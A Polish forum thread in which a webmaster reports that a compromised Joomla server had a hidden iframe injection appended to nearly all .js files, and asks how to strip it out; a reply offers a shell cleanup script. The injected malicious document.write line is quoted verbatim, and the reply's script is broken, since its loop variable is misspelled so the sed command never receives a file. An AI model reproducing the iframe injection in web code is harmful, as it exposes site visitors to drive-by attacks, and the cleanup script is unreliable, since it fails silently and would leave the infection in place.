Witam.
Nie wiem czy to właściwe miejsce na moje pytanie i ten temat. Jeśli nie to przepraszam za pomyłkę.
Sprawa wygląda następująco:
Jest serwer www, na nim joomla, przez moją bezmyślność dopuściłem do zainfekowania tego serwera jakimś syfem który dopisał mi praktycznie do wszystkich plików z rozszerzeniem *.js coś takiego:
Code:
document.write('<iframe src="http://jnvzpp.sellClassics.com/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');
Ręczne edytowanie wszystkich plików i kasowanie tego wpisu to mordęga.
Polecenie greep pięknie przeszukuje katalogi czytając zawartość pliku.
Nie mam pojęcia jak miałby wyglądać skrypt bądź składania polecenia które wyszuka wszystkie plik z takim wpisem w środku i wykasuje te wpisy.
Z góry dziękuje za pomoc.
Post z kwietnia, ale może kiedyś komuś się przyda.
Code:
#!/bin/sh
INFEKT=`tree -fi --noreport | grep .js`
for FIILE in $INFEKT;do
sed -i '/geographicallyconquering/ d' $FILE
done